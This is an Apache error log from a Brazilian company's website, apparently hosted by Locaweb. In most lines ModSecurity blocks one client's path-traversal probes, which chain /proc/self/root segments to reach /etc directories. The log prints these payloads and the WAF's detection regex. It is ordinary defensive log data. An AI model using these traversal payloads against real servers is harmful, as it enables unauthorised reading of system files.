[Tue Mar 17 22:24:42.443361 2026] [:error] [pid 25836:tid 140411624429312] [client 74.7.241.31:41866] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/rwtab.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abn-2oh-PF_25v4hFRCbbwAAAQ4"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 22:24:44.149988 2026] [proxy_fcgi:error] [pid 11816:tid 140411548894976] (70007)The timeout specified has expired: [client 179.188.53.243:32976] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 22:24:45.682695 2026] [:error] [pid 25836:tid 140411624429312] [client 74.7.241.31:41880] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/lwcorp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abn-3Yh-PF_25v4hFRCbdwAAAQ4"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 22:24:47.411634 2026] [:error] [pid 18211:tid 140411716749056] [client 74.7.241.31:36490] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/gnupg"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abn-3xcIZFNFgEhGGCRHVAAAA8M"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 22:24:48.986783 2026] [:error] [pid 16560:tid 140411708356352] [client 74.7.241.31:36496] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/dovecot"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abn-4K6gUSg3B_dEMdIXcwAAAcQ"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 22:24:50.550935 2026] [:error] [pid 26799:tid 140411683178240] [client 74.7.241.31:36504] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/grub.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abn-4ta6ubjKNq_cu4Y13AAAA0c"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 22:24:52.193429 2026] [:error] [pid 26799:tid 140411548894976] [client 74.7.241.31:36504] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/openldap"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abn-5Na6ubjKNq_cu4Y13gAAA1c"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 22:24:52.859260 2026] [:error] [pid 26799:tid 140411565680384] [client 74.7.241.31:36504] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/puppetlabs"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abn-5Na6ubjKNq_cu4Y13wAAA1U"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 22:24:54.475093 2026] [:error] [pid 11816:tid 140411582465792] [client 74.7.241.31:36520] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/ipmi"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abn-5uw_le52K8_3pV182wAAAhM"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 22:24:56.493664 2026] [:error] [pid 15051:tid 140411540502272] [client 74.7.241.31:36534] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/tuned"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abn-6CmAPhZkrhU8w4kRSQAAAJg"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 22:24:58.415007 2026] [:error] [pid 25836:tid 140411725141760] [client 74.7.241.31:40716] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/groff"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abn-6oh-PF_25v4hFRCbfAAAAQI"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 22:25:00.479071 2026] [:error] [pid 18211:tid 140411624429312] [client 74.7.241.31:40726] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/logrotate.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abn-7BcIZFNFgEhGGCRHWQAAA84"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 22:25:00.770659 2026] [:error] [pid 18211:tid 140411691570944] [client 74.7.241.31:40726] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/cloud"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abn-7BcIZFNFgEhGGCRHWgAAA8Y"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 22:25:01.247747 2026] [:error] [pid 18211:tid 140411599251200] [client 74.7.241.31:40726] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/raddb"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abn-7RcIZFNFgEhGGCRHWwAAA9E"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 22:25:04.191198 2026] [:error] [pid 19507:tid 140411557287680] [client 74.7.241.31:40730] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/statetab.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abn-8NY0UrI5A3LftIwu-gAAAZY"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 22:25:06.174061 2026] [:error] [pid 17887:tid 140411741927168] [client 74.7.241.31:40732] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/dhcp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abn-8gkwaGbbGflqUZCzzQAAAMA"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 22:25:07.145956 2026] [proxy_fcgi:error] [pid 2598:tid 140411725141760] (70007)The timeout specified has expired: [client 179.188.53.243:33574] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 22:25:08.008130 2026] [:error] [pid 18211:tid 140411599251200] [client 74.7.241.31:57394] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/skel"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abn-9BcIZFNFgEhGGCRHYAAAA9E"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 22:25:09.807526 2026] [:error] [pid 2598:tid 140411725141760] [client 74.7.241.31:57402] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/wpa_supplicant"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abn-9Rj0p0SRWAqcjGGqTAAAAwI"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 22:25:13.563053 2026] [:error] [pid 11816:tid 140411725141760] [client 74.7.241.31:57406] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/gcrypt"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abn--ew_le52K8_3pV186AAAAgI"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 22:25:17.749053 2026] [:error] [pid 17972:tid 140411540502272] [client 74.7.241.31:57420] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/depmod.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abn-_YZ5-GlpYjVrXCrlwwAAAlg"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 22:25:20.311072 2026] [:error] [pid 17653:tid 140411599251200] [client 74.7.241.31:34324] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/modsecurity"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abn_AMdf6f5d65gmYZRvswAAAtE"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 22:25:20.543690 2026] [:error] [pid 17653:tid 140411599251200] [client 74.7.241.31:34324] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/udev"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abn_AMdf6f5d65gmYZRvtAAAAtE"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 22:25:22.019397 2026] [:error] [pid 2598:tid 140411725141760] [client 74.7.241.31:34328] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/cron.weekly"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abn_Ahj0p0SRWAqcjGGqUAAAAwI"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
